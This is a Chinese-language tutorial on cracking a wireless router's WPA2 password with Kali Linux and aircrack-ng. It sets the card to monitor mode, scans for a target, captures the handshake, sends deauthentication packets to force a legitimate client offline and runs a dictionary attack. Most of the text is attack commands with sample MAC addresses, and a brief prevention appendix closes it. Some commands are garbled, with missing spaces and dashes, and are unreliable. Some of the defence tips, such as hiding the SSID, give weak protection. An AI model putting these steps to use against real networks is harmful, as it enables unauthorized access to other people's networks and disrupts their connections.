WPA2密码破解方法

无线路由器WPA2加密破解方法1、启动KALI系统，并将无线网卡接入到KALI虚拟机中。

判断wlan无线网卡是否存在，此时无线网卡名称为wlan0 命令：ifconfig-a

2、为攻击做准备，停止部分服务

命令：airmon-ngcheckkill

3、将无线网卡转为监控模式

此时无线网卡名称从wlan0切换为wlan0mon

命令：airmon-ng start wlan0

4、扫描附近无线网络，寻找需要攻击的目标

确认要攻击目标的bssid和ch

命令：airodump-ng wlan0mon

5、开始抓握手包

命令：airodump-ng -c 1–bssid C8:3A:35:18:FB:88 -w pojie wlan0mon 参数-c要破解AP所在频道

--bssid要破解AP的MAC地址

-w抓取包保存的文件名

注意：最后一行信息的BSSID是AP的MAC地址，STATION是合法已经登录的客户端的MAC地址，下一步要将攻击该客户端，使其重新登录

6、保持当前终端窗口继续进行，打开一个新的终端，对合法的客户端进行攻击，使其下线

后重新登录，从而抓握手包。

命令：aireplay-ng –deauth1 -a C8:3A:35:18:FB:88 -c 01:AF:72:44:B1:AB wlan0mon

命令操作成功后，抓包窗口右上角会提示获取了握手数据包

7、利用抓取的数据猜解密码

命令：aircrack-ng-w/dict/wordlistpojie-01.cap

参数：/dict/wordlist密码字典，真实环境下可以用数亿条数据，测试时用我们可以自建密码字典

Pojie-01.cap是抓取的数据包，每次重新抓取后面的数值自增一个，变为02 03….

附录：制作密码字典

#mkdir/dict

#echo 12345678 >> /dict/wordlist

#echo 123456789 >> /dict/wordlist

#echo 1234567890 >> /dict/wordlist

附录：防止WPA2密码被破解的方法

1、wifi密码设得足够复杂，最少要设得10位以上，字母与数字混合。

2、关闭ssid广播功能，避免被扫描到

3、开启MAC地址白名单，将允许访问的客户端的地址加入到无线路由器的白名单中。